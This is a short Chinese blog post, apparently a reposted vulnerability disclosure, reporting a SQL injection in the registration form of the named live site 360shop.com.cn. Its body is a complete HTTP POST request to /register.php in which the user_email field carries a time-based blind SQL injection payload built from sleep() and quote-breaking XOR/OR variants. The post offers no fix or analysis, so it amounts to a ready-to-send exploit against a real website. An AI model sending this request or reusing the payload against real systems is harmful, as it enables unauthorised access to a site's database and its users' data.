360shop官网post注入一枚 – 网站安全 – 自学php

时间: 2020-10-10|tag: 47次围观|0 条评论

漏洞网站:http://www.360shop.com.cn   post信息:   

POST /register.php HTTP/1.1

Content-Length: 254

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.360shop.com.cn:80/

Cookie: 360shop_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 360shop_sid=41122db3f1f267c38aa9a68ff9158120; 360shop_validity_time=0; PHPSESSID=l7498dqlinampsn9mga7gdlqi2

Host: www.360shop.com.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Accept: */*



action=register&code_sn=94102&isagreement=1&password=g00dPa%24%24w0rD&register=1&repassword=g00dPa%24%24w0rD&user_email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

 

  user_email存在漏洞     360shop官网post注入一枚 – 网站安全 – 自学php插图 360shop官网post注入一枚 – 网站安全 – 自学php插图1

    上一篇: phpcms2008会员中心某处xss - 网站安全 - 自学php

    下一篇: siteserver最新版3.6.4 sql inject 第十蛋 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《360shop官网post注入一枚 – 网站安全 – 自学php
   

还没有人抢沙发呢~